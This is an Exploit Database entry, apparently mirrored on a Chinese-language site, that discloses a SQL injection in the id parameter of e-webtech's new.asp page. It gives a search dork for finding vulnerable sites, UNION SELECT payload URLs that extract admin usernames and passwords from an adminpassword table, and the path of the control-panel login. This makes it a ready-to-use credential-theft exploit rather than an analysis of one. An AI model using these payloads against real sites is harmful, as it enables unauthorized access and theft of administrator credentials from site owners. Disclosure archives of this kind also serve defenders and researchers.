e-webtech – ‘new.asp?id=’ SQL Injection

• Exploit Database
• 117 阅读

• 作者： protocol
  日期： 2010-05-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12547/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34

  ************************************************************ ** (new.asp?id=) SQL Injection Vulnerability ************************************************************ ** Home: http://www.dz4all.com/cc | http://www.h4ckforu.com/vb ** Risk: high ** Title: (new.asp?id=) SQL Injection Vulnerability ** Dork: "Powerd by www.e-webtech.com" ************************************************************ ** Discovred by: protocol ** From : algeria ** Contact : pre@live.fr ** ********************************************************* ** Greet to : ** All Members of http://www.dz4all.com/cc | http://www.h4ckforu.com/vb ** And My ViRuS_Ra3cH & kondamne & komandos & yasMouh & N2N ************************************************************ ** Exploit: ** ** http://localhost.com/new.asp?id=1+union+select+0+from+adminpassword ** ** ** Column: username | password & pw ** ** ** Control Panel: http://localhost.com/controlpanel/login.asp ** ** Example: ** ** ** http://server/news.asp?id=412+union+select+1,2,username,pw,5,6,7,8,9,10,11+from+adminpassword ** ** ************************************************************